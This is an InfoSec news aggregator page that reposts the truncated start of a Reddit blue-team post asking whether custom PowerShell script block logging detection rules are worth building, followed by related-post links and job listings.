all InfoSec news
Custom Detection Rules for PowerShell (W/ Script Block Logging Enabled). Is it even worth it?
May 21, 2024, 6:46 a.m. | /u/sha3dowX
For [Blue|Purple] Teams in Cyber Defence www.reddit.com
In my work environment, we are considering enabling PowerShell Script Block logging because EDR tools don’t natively capture PowerShell interactive session commands or script contents unless a live investigation is conducted (and only captures initial process command lines with PowerShell.exe that started the process). Since we already ingest Windows event logs, enabling script block logging seems logical to enhance our threat hunting and forensic capabilities.
After enabling it enterprise-wide, I’m
thinking of creating custom detection rules based on the …
block blueteamsec capture command commands custom detection detection rules don edr environment hello investigation live logging powershell powershell script process rules script script block logging session tools work work environment
More from www.reddit.com / For [Blue|Purple] Teams in Cyber Defence
CVE-2024–28999 SolarWinds Race Condition
1 day, 1 hour ago |
www.reddit.com
Snowflake Threat Hunting Guide
3 days, 18 hours ago |
www.reddit.com
How much offensive knowledge do blue team need to know?
4 days, 4 hours ago |
www.reddit.com
Jobs in InfoSec / Cybersecurity
Information Technology Specialist I: Windows Engineer
@ Los Angeles County Employees Retirement Association (LACERA) | Pasadena, California
Information Technology Specialist I, LACERA: Information Security Engineer
@ Los Angeles County Employees Retirement Association (LACERA) | Pasadena, CA
Vice President, Controls Design & Development-7
@ State Street | Quincy, Massachusetts
Vice President, Controls Design & Development-5
@ State Street | Quincy, Massachusetts
Data Scientist & AI Prompt Engineer
@ Varonis | Israel
Contractor
@ Birlasoft | INDIA - MUMBAI - BIRLASOFT OFFICE, IN